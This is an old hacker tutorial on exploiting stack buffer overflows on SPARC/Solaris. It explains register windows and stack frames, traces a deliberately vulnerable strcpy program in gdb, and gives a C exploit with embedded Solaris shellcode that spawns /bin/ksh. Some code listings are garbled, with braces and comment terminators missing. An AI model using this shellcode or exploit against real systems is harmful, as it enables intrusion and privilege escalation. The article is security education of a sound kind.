" IT'S TOASTED "                             

             Exploiting SPARC Buffer Overflow vulnerabilities             
                          by pr1 <pr1@u-n-f.com>


----/  1 - Introduction

 Sparc is a RISC architecture build by Sun Microsystems. It´s supported by many
operating systems like Solaris, Linux, OpenBSD, NetBSD,...
As Sun decided to develop Solaris >= 9 for Sparc only and as there
is not much information on Sparc overflows on the net i decided to write
this article. There are some major differences in handling the calling
and returning from functions and stack management on Sparc that are
worth knowing. If you ever asked yourselve: "Why am I unable exploit this
simply strcpy() in main() on Sparc ...". This paper has the answer.

----/ 2 - Architecture Overview

 There are 32 general purpose registers on Sparc at any given time. 
8 of them are global, these are the "global" registers. They are called 
%g0 - %g7 and are consistent during procedure calls. Then there are 
another 24 registers in a so called register window. A window consists 
of 3 types of registers. The "in", "out" and "local" registers. 
A Sparc implementation can have from 2-32 windows thus having 
40 - 520 registers. ( remember that the global registers are static ) 
The variable number of registers is the reason to call Sparc scalable.  
 At any given time only one window is visible. This window is determined
by the CWP ( current window pointer ) which is part of the PSR ( processor 
status register in Sparc V8 ). Its a whole register in Sparc V9.

 These instructions are primarily used for procedure calls. The concept is
that "in" registers contain procedure arguments, "local" registers can be 
used for storing values while the procedure executes, "out" registers contain 
outgoing arguments. The "global" registers are used for values that do not 
change much between procedure calls. 

 The register windows overlap partially. The SAVE operation renames the "out" 
registers to become the "in" registers of the called procedure. Because 
procedure calls are a quite frequent operation this was meant to improve 
 Actually this was a bad idea caused by studies that only considered 
insolated programs. The drawback is: With interaction with the system the 
registers have to be stored on the stack which results in a lot of slow 
store and load instructions.

----/ 2.1 - Sparc Registers

The Registers are organized as follows:

%g0 - %g7 ( %r0 - %r7 )  : global - registers
%o0 - %o7 ( %r8 - %r15 ) : out - registers, they contain arguments for
                           procedure calls
%l0 - %l7 ( %r16 - %r23 ): local - registers, use them for local variables 
%i0 - %i7 ( %r24 - %r31 ): in - registers, after a procedure call these 
                           registers contain incoming arguments
Some special registers:
%g0        : always contains zero ( hardwired )
%sp ( %o6 ): the stack pointer, points to the top of the stack frame
             ( the last element pushed onto it )
%o7        : called subroutines return address
%fp ( %i6 ): the frame pointer, points to the bottom of the stack frame
%i7        : subroutine return address ( return address - eight )
%o0        : return value from called subroutine

----/ 2.2 - The Sparc Pipeline
 The Sparc Architecture uses a pipeline to improve performance. A pipeline 
is used to fetch/execute more instructions in the same time as without a
pipeline. Usually there are several steps until a CPU finishes the execution 
of an instruction. The instruction has to be fetched, decoded, executed, 
branches have to be completed ( pc = npc ) and results have to be written 
to the destination. 
Doing all this things and then start from the beginning with the next instruction 
is a waste of time. Thus a pipeline was implemented to fetch instructions. While 
it decodes the first instruction it fetches the next one... and so on.
Using this technique several instructions can be executed almost in 
parallel. How these steps are implemented differs from pipeline to pipeline. 
The Sparc pipeline has a depth of two. Hence there is a PC and a nPC 
( next Program counter pointing to the next instruction to be executed ). 
nPC is always copied into PC after the current instruction was executed.

 You might ask yourself what happens if the CPU executes a branch instruction
( jumps somewhere ) and already has the next instrucion in the pipeline. 
It´s unknown at compile time whether this branch will be taken or not.
The allready fetched instruction could simply be discarded but this 
would be a perfomance lost. Thus the Sparc architecture executes the 
instruction following the branch instruction before the branch is taken.

e.g.: call subroutine   <- %o0 is allready zero here
      xor %o0,%o0,%o0   <- executed before call

This is known as a branch delay slot.
---/ 2.3 - Instruction size

 The x86 instructions differ in their length. Sparc uses a pipeline to 
improve perfomance and the designers found it easier to implement every 
instruction as a four byte opcode sequence. But this also means that a 
NOP has a length of four bytes as well. Usually this would be a little problem 
( consider what happens if we jump into the middle of a NOP ).
Because we have to care about alignment this problem vanishes soon 

---/ 2.4 - Function calls

 The Sparc architecture uses the call/ret instruction pair to implement 
procedure calls. Both the CALL and RET instruction are so called synthetic 
instructions. The hardware equivalent instruction 
( the instruction assembled into the binary ) is a jump ( jmpl ). 
Note "l" stands for link not for long.

The assembler plays a bigger role on executinoi speed on RISC than on CISC:
	* The assembler reorders instruction to a logical eqivalent 
	  procedure to prevent different pipeline hazards.
	* It also optimizes branch delay slots via placing instructions
	  in there.
	* It inlines macros of synthetic instructions or even compounds
For example: 

	* call subroutine == jmpl subroutine,%o7 
	  ( remember that %o7 contains the called subroutines return address )
 	* ret == jmpl %i7+8,%g0 
 	( remember that %i7 is ret address - 8, %g0 always 
 	  contains zero )
 The CALL instruction saves the current value of PC in %o7, updates PC and 
sets nPC to the address specified in the CALL.
 The RET instruction updates PC and sets nPC to %i7+8. 8 bytes are added to 
the address because the address saved in %i7 is the address of the call 
instruction. Because all instructions have a size of four bytes and there is a 
branch delay slot of four bytes after the call we have to skip eight bytes. 
%i7 is used instead of %o7 because the SAVE instruction renamed the "out" 
register to "in" registers.

 Next thing a procedure does is building some stack space to store automatic 
( local ) variables, compiler temporaries, pointer to return value, ...
This is done with the SAVE and RESTORE instructions.

        The SAVE instruction reserves stack space for the above mentioned 
        things. Its syntax is:  
                                save %sp, imm(ediate value), %sp.
        SAVE now makes the old %sp the new %fp, adds imm to the old %sp and 
        stores the new value in the new %sp. Because the stack grows down 
        imm should be a negative value. The CPW flag in the PSR 
        register is also decremented.  ( out registers become in registers ).

        Note that on Sparc V9 the behaviour is a little different. Sparc V9 
        has a seperate register for CWP. SAVE increments the CWP and RESTORE 
        decrements it.

       RESTORE now increments CWP ( Sparc V9 decrements ) the CPW. 
       In registers become the out registers. The eight input registers and the 
       eight local registers are restored to the values they contained 
       before the most recent SAVE instruction. The restore instruction 
       then acts like an add instruction except that the source registers 
       are from the old register set and the destination register is from 
       the new register set. Making %fp the new %sp.

A procedure epilogue and prologue thus look like:

	save %sp, -368, %sp

Restore is executed one slot later in the pipeline, but its effects take 
place before ret changes the %pc.

---/ 2.5 - Leaf and Optimized Leaf Procedures

 A leaf procedure is a procedure that does not call any other procedures. 
A routine that does not allocate a register window of its own by calling 
the SAVE instruction is termed an optimized leaf procedure.

 One way to recognize an optimized leaf procedure is by scanning the output 
of the assembly code instructions and noting the absence of a SAVE 
instruction. Leaf routines do not have a stack frame allocated to them. 
Leaf routines use their caller's stack frame and register window.

 If the routine is leaf the previous frames PC should be looked up in 
register %o7. Otherwise it needs to be looked up in register %i7, which is 
what register %o7 becomes after a SAVE instruction. This is what defines 


---/ 2.6 - The Sparc Stack

                                 High Addresses
        %fp ->       cw |  automatic variables  |   				
                     cw |   space allocated with alloca()  |		
                     cw |   space for compiler temporaries | 	
                     cl |        outgoing parameters       |
                     cl |     copies of outgoing parameters      |
                     cl |     one word ( hidden parameter )      |
         %sp ->      cl |  64 byte for possible copy of register window |
                                   Low Addresses

The stack consists of 2 parts:

	Current Workspace ( cw ):
	The current workspace is used by C procedures. It consists of 
	automatic variables, space allocated by alloca() and space for 
	compiler temporaries. When writing an assembly routine you only 
	have to calculate space for temporary values you need. 

	Call Linkage ( cl ):

	This space is required to save outgoing registers and the register 
	window when control passes to another procedure.
	The Call Linkage is important for exploiting Sparc overflows.

The minimum stack frame size is 96 byte. 
It consists of:

			* 64 bytes for copy of register window
			* 6 * 4 bytes for outgoing parameters
			* 4 bytes for the hidden parameter

 This are only 92 byte but the stack and frame pointer 
require to be on a eight byte boundary ( 92 is not divisible by eight ).
Hence the minimum stack frame size is 96 byte.
 The reason to be on a eight byte boundary is that there is at least space for one 
temporary variable.

 As the current workspace contains a dynamically allocated field( alloca() ). 
We can not tell how much blocks this will be at compile time. Hence automatic 
variables are accessed via %fp as negative offsets and the others are 
accessed via %sp as positives offsets. 

----/ 3 - A demonstration vulnerability

 Not every buffer overflow is exploitable on Sparc. We need at least one 
level of nesting function to be able to exploit it.

void copy( const char *a ){
	char buf[256];


main( int argc, char *argv[] ) {

	copy( argv[1] );


---/ 3.1 - Studying the overflow in theory 

Let us recall what happens on function calls and function returns.

    %i7 contains main´s return address. It will return into exit() 
    in _start to perform cleanup before program termination.

    main() calls copy(), jmpl ( call ) saves the return address back 
    into main() in register %o7 and the SAVE instruction in/decrements 
    the register window renaming %o7 into %i7. %i7 is allready filled with 
    main´s() return address into exit() though. Thus main´s() register 
    window is stored on copy´s() stack frame. %i7 contains now copy´s() 
    return address back into main.

    strcpy() follows the same algorithm. 
    After strcpy() overwrites parts of our stack we also overwrite copy´s() 
    initial stack frame. Strcpy´s() stack frame and its stored return 
    address back into copy() are still intact and strcpy() returns back 
    into copy(). All register contents are still intact but copy´s() stack 
    frame is damaged. Copy() finally restores and jumps back to main(). But 
    main´s() register window was saved on copy´s() stack frame and damaged 
    by our overflown strcpy(). When returning back into main() the 
    saved/damaged register window is restored. The input and local registers 
    now contain user supplied data. When main() returns it would usually jump 
    into exit() in _start to perform cleanup, but as we changed the return 
    address it jumps into nowhere ( 0x61616161 ) and dies with a SIGBUS error.

---/ 3.2 - Studying the overflow with gdb

 Let us feed this into gdb and see what happens. Note that i have deleted
redundant information like static registers that are not saved in the
register windows to shorten the output and to make the overflowing
process clearer.

This are our registers in main before copy is called.

(gdb) info register
sp             0xffbef838	
o7             0x106c0	
l0             0xc	
l1             0xff3400a4	
l2             0xff33c5d8	
l3             0x0	
l4             0x0	
l5             0x0	
l6             0x0	
l7             0xff3e6694	
i0             0x2	
i1             0xffbef90c	
i2             0xffbef918	
i3             0x20870	
i4             0x0	
i5             0x0	
fp             0xffbef8a8	
i7             0x104c8	

This is our stack frame before copy() is called.
Thats our saved register window. Note the saved PC at 0xffbef874.
(gdb) x/96x $sp
%sp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000  [%l0 - %l3]       
       0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694  [%l4 - %l7]
       0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870  [%i0 - %i3]
       0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8  [%i4 - %i7]
            .           .          .          .         .
            .           .          .          .         . 
            .           .          .          .         .
%fp -> 0xffbef9a8: 0x00000003 0x00010034 0x00000004 0x00000020     
Breakpoint 5, 0x10610 in copy ()

Register values in copy() before the call to strcpy().

(gdb) info register
sp             0xffbef6c8	
o7             0x0			
l0             0x0	
l1             0x0	
l2             0x0	
l3             0x0	
l4             0x0	
l5             0x0	
l6             0x0	
l7             0x0	
i0             0xffbefa37	
i1             0xffbef910	
i2             0xffbef90c	
i3             0x300	
i4             0x2371c	
i5             0xff29bbc0	
fp             0xffbef838	
i7             0x10640	

 And the stack frame befor the strcpy() call. Note how the saved register 
window ( of main() ) moved "below" our input buffer.
 This is the register window of copy(). We will not be able to overwrite the 
PC at 0xbffef704 because its "above" our input buffer. This PC contains 
the return address back to main.

(gdb) x/96x $sp

%sp -> 0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000  
       0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
       0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640  [saved PC]
            .           .          .          .          .
            .           .          .          .          .
            .           .          .          .          .
buf -> 0xffbef728: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef738: 0x00000000 0x00000000 0x00000000 0x00000000
       0xffbef748: 0x00000000 0x00000000 0x00000000 0x00000000
            .           .          .          .          .
            .           .          .          .          .
            .           .          .          .          .
%fp -> 0xffbef838: 0x0000000c 0xff3400a4 0xff33c5d8 0x00000000
       0xffbef848: 0x00000000 0x00000000 0x00000000 0xff3e6694
       0xffbef858: 0x00000002 0xffbef90c 0xffbef918 0x00020870
       0xffbef868: 0x00000000 0x00000000 0xffbef8a8 0x000104c8 <- PC
                                          ( PC to exit (in _start ) )
Breakpoint 6, 0x1061c in copy ()
Register values after strcpy() overflowed the buffer.

(gdb) info register
sp             0xffbef6c8	
o7             0x10614	
l0             0x0	
l1             0x0	
l2             0x0	
l3             0x0	
l4             0x0	
l5             0x0	
l6             0x0	
l7             0x0	
i0             0xffbefa37	
i1             0xffbef910	
i2             0xffbef90c	
i3             0x300	
i4             0x2371c	
i5             0xff29bbc0	
fp             0xffbef838	
i7             0x10640	

And the corrupted stack frame.
(gdb) x/96x $sp
      0xffbef6c8: 0x00000000 0x00000000 0x00000000 0x00000000
      0xffbef6d8: 0x00000000 0x00000000 0x00000000 0x00000000
      0xffbef6e8: 0xffbefa37 0xffbef910 0xffbef90c 0x00000300
      0xffbef6f8: 0x0002371c 0xff29bbc0 0xffbef838 0x00010640* 
          .            .        [ *  PC to main still intact ]
          .            .          .          .          .
          .            .          .          .          .
          .            .          .          .          .
buf-> 0xffbef728: 0x61616161 0x61616161 0x61616161 0x61616161
      0xffbef738: 0x61616161 0x61616161 0x61616161 0x61616161
      0xffbef748: 0x61616161 0x61616161 0x61616161 0x61616161
      0xffbef758: 0x61616161 0x61616161 0x61616161 0x61616161
         .             .          .          .          .
         .             .          .          .          .
         .             .          .          .          .
      0xffbef868: 0x61616161 0x61616161 0x61616161 0x61616161* 
                                        [* PC to exit damaged ]

 Very nice. We were able to alter main´s() saved PC into exit.
After copy() restores the in and local registers are set to the 
"saved/damaged" values. Hence we altered these values due to the overflow 
of the input buffer the in and local registers contain our supplied values.
Breakpoint 7, 0x10648 in main ()
(gdb) info register
sp             0xffbef838	
o7             0x10640	   
l0             0x61616161	
l1             0x61616161	
l2             0x61616161	
l3             0x61616161	
l4             0x61616161	
l5             0x61616161	
l6             0x61616161	
l7             0x61616161	
i0             0x61616161	
i1             0x61616161	
i2             0x61616161	
i3             0x61616161	
i4             0x61616161	
i5             0x61616161	
fp             0x61616161	
i7             0x61616161   <- next ret will jump here+8

Main is now about to cleanup and jump into exit. But as we altered it´s saved
PC it will jump into 0x61616161+8 and die.

----/ 4 - Building an exploit	  

 In this section we will build an exploit for the the vulnerability we just
studied. We also list some differences between x86 and Sparc exploitation
and cover alignment issues.

---/ 4.1 - Differences between x86 and Sparc exploitation

* memory access:
    On x86 as on most CISC processors we can write to unaligned memory 
    addresses without the CPU complaining. Sometimes we only have to 
    adjust the alignment. Not so on Sparc. See more about alignment at 4.2.
    Note that writing to unaligned memory addresses is a CPU feature of
    the x86 family. It will complain if the AC ( alignment check ) flag
    is set in the flag register.

* call/ret internals:                                                                            

    Because of the internal working of the sparc stack frames and ret/call 
    pairs we need at least one level of nesting function to be able to 
    exploit a buffer overflow vulnerability on a Sparc.

* finding the stack base address:
    Sparc Solaris uses a different stack base address on different 
    - sun4u: 0xffbe....,
	- sun4m: 0xefff....,
	- sun4d: 0xdfff.... 
	We can get the stack base address with the following assembler snippet:
	unsigned long get_sp( void ) {
		__asm__(" or %sp, %sp, %i0 " );

* size of overflow:
    On a Sparc we usually have to be able to write more than just a 
    few  bytes beyond the target buffer. This is because we have to overwrite 
    at least %l0 - %l7 and %i0 - %i6 before reaching the saved return address.

* overwriting an address with one byte:
    Overflowing an address with one byte on x86 lets us control
    the least significant byte. Chances are good that we can 
    alter some stack address a little bit to point into our shellcode.
    As Sparc is a big endian architecture we can only write from most 
    to least significant byte. Thus we can alter only the most 
    significant order byte with a one byte overflow. This decreases 
    our chances of providing some usefull address.
    See [3] for more details on one byte overflows. 
---/ 4.2 - Alignment 

 As most other RISC processors Sparc does not allow unaligned memory 
accesses. This means we must not read from, write to or jump to any 
address that is not on a 4 byte boundary. Otherwise the CPU generates 
a Bus Error exception and our program dies. Also consider what happened 
if we jumped into the middle of one of our NOPs. Remember that every 
Sparc instruction is 4 bytes long. It is very probable that the processor 
would generate an Illegal Instruction exception and our program crashed 
as well.

 That is why we have to take care that our exploit return address is a 
multiple of 4, our shellcode lies at a 4 byte boundary in our attack 
buffer and our attack buffer itself is a multiple of 4.

---/ 4.3 - Exploiting the vulnerability

 Note that we take care about writing only to aligned memory addresses. 
If we put our shellcode to some unaligned address in our attack buffer
we will never be able to reach it. Same with the nops. Unaligned nops 
makes us jump into the middle of a nop everytime we would reach the nops. 
This results in an Illegal Instruction exception and our program dies 
without executing our code.

We also have to set %fp to a "save" address or the retl instruction will
crash. A "save" address simply is some stack address. We could also use 
our return address to overwrite %fp. 

/* Exploits toy vulnerbility on Sparc/Solaris
 * pr1
 * June 2002


/* lsd - Solaris shellcode 
static char shell[]=         /* 10*4+8 bytes */

        "\x20\xbf\xff\xff"   /* bn,a  */
        "\x20\xbf\xff\xff"   /* bn,a  */
        "\x7f\xff\xff\xff"   /* call  */
        "\x90\x03\xe0\x20"   /* add %o7,32,%o0 */
        "\x92\x02\x20\x10"   /* add %o0,16,%o1 */
        "\xc0\x22\x20\x08"   /* st %g0,[%o0+8] */
        "\xd0\x22\x20\x10"   /* st %o0,[%o0+16] */
        "\xc0\x22\x20\x14"   /* st %g0,[%o0+20] */
        "\x82\x10\x20\x0b"   /* mov 0x0b,%g1 */
        "\x91\xd0\x20\x08"   /* ta 8 */
        "/bin/ksh" ;

#define BUFSIZE 336

static char np[] = "\xac\x15\xa1\x6e";

unsigned long get_sp( void ) {
        __asm__("or %sp,%sp,%i0");

main( int argc, char *argv[] ) {

        char buf[ BUFSIZE ],*ptr;
        unsigned long ret,sp;
        int rem,i,err;

        ret = sp = get_sp();

        if( argv[1] ) {
                ret -= strtoul( argv[1], (void *)0, 16 );

        /* align return address */
        if( ( rem = ret % 4 ) ) {
                ret &= ~(rem);
        bzero( buf, BUFSIZE );
        for( i = 0; i < BUFSIZE; i+=4 ) {
                strcpy( &buf[i], np );

        memcpy( (buf + BUFSIZE - strlen( shell ) - 8),shell,strlen( shell ));

        ptr = &buf[328];
        /* set fp to a save stack value
        *( ptr++ ) = ( sp >> 24 ) & 0xff;
        *( ptr++ ) = ( sp >> 16 ) & 0xff;
        *( ptr++ ) = ( sp >> 8 ) & 0xff;
        *( ptr++ ) = ( sp ) & 0xff;

        /* we now overwrite saved PC
        *( ptr++ ) = ( ret >> 24 ) & 0xff;
        *( ptr++ ) = ( ret >> 16 ) & 0xff;
        *( ptr++ ) = ( ret >> 8 ) & 0xff;
        *( ptr++ ) = ( ret ) & 0xff;
        buf[ BUFSIZE -1 ] = 0;

#ifndef QUIET
        printf("Return Address 0x%x\n",ret);
        err = execl( "./vul", "vul", buf, ( void *)0 );
        if( err == -1 ) perror("execl");

----/ 5 - Alternative ways of exploitation

 As we saw very small overruns are not as likely to be exploitable on 
Sparc as they are on other platforms. But let us consider some
special cases where you are able to overwrite other sensitive 
information on the stack.

 An example is overwriting a programs function pointer or jumpbuf with 
the address of system and telling it to execute /bin/sh.
See [4] for more information about overwriting such structures.

 On sparc the text segment is mapped to small addresses.
If we now try to overwrite this function pointer/jumpbuf with some other
function - address. We can not write this small address into the register 
without any 0x00 bytes. This is because we can only write from most to least
significant byte on Sparc.

 An alternative way is placing shellcode onto the stack and overwriting
the function pointer with the shellcodes stack address which comprises
eight bytes.

 Because of Alignment restrictions on Sparc we can´t exploit format 
string vulnerabilities via the "%n" directive.( Writing one byte 4 times )
by using the short  qualifier the alignment is emulated either in software 
or special machine instructions are used, and you can usually write on every 
two byte boundary. See [6] for more information. 
 The return into libc technique can also be applied on Solaris/Sparc to 
defeat non executable stack patches. See [7] for more information.

 Dynamic heap overflows via corruption of malloc internal structures
are exploitable on Sparc as well.
See [8] and [9] for a glibc and the SysV malloc implementation and
exploitation discussion.

----/ 6 - Conclusion
 We need a bit more luck to be able to exploit Sparc buffer overflows
than their brothers/sisters on x86. In general it is not enough to be 
able to overwrite just a few bytes of the buffer. Additionaly we saw that 
the way the stack is handled has a great influence on the  exploitability 
issue of its buffer overrun vulnerabilities. This class of vulnerablities 
can not always be exploited on Sparc as there must exist at least one level 
of subroutine calls nesting, so that two concurrent ret/restore pairs can be 
executed by a vulnerable program after its stack got overrun.

----/ 7 - References

 [1] UNF - United Net Frontier
 [2] Sun Microsystems 
      Sparc Assembly Language Reference Manual
 [3] Klog 
      Frame pointer overwriting
 [4] Matt Conover aka. Shok 
      w00w00 on Heap Overflows
 [5] some interesting pdfs about computer architectures
 [6] Scut
 	 Exploiting Format String vulnerabilities

 [7] Horizon
      Return into libc exploits on Sparc/Solaris

 [8] Maxx
      Exploiting dynamic heap overflows via malloc chunk corruption.
 [9] Exploiting dynamic heap overflows via malloc chunk corruption.	   

----/ 8 - Greetings

	- Big thx to Scut for reviewing the paper
	- Svoern for mental support 
	- all the other UNF fellows